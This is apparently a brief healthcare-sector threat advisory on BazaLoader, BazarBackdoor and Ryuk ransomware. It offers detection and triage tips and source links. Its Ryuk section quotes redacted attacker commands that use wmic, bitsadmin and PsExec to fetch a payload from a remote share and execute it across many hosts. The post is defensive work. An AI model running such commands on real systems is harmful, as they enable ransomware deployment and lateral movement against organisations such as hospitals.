With the recent disclosures, organizations in healthcare must understand the threat against them as it stands right now. Understanding the mechanisms of how BazaLoader, BazarBackdoor, and Ryuk operate will enable defenders to know what to triage and isolate first. If a host has signs of ransomware on the host, shut it down as soon as possible to prevent further spread. BazaLoader is extremely quiet on a system but can leave some artifacts to be investigated further, as detailed below.
BazaLoader:
Scheduled Task Name: Start
Bitsadmin:
Look for jobs attempting to make outbound network connections to domains/IPs that you do not have any association with.
Ryuk (FireEye) :
start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create “cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe”

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY “\\[REDACTED]\share$\vVv.exe” “C:\windows\temp\vVv.exe”

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Resources:
https://us-cert.cisa.gov/ncas/alerts/aa20-302a
https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html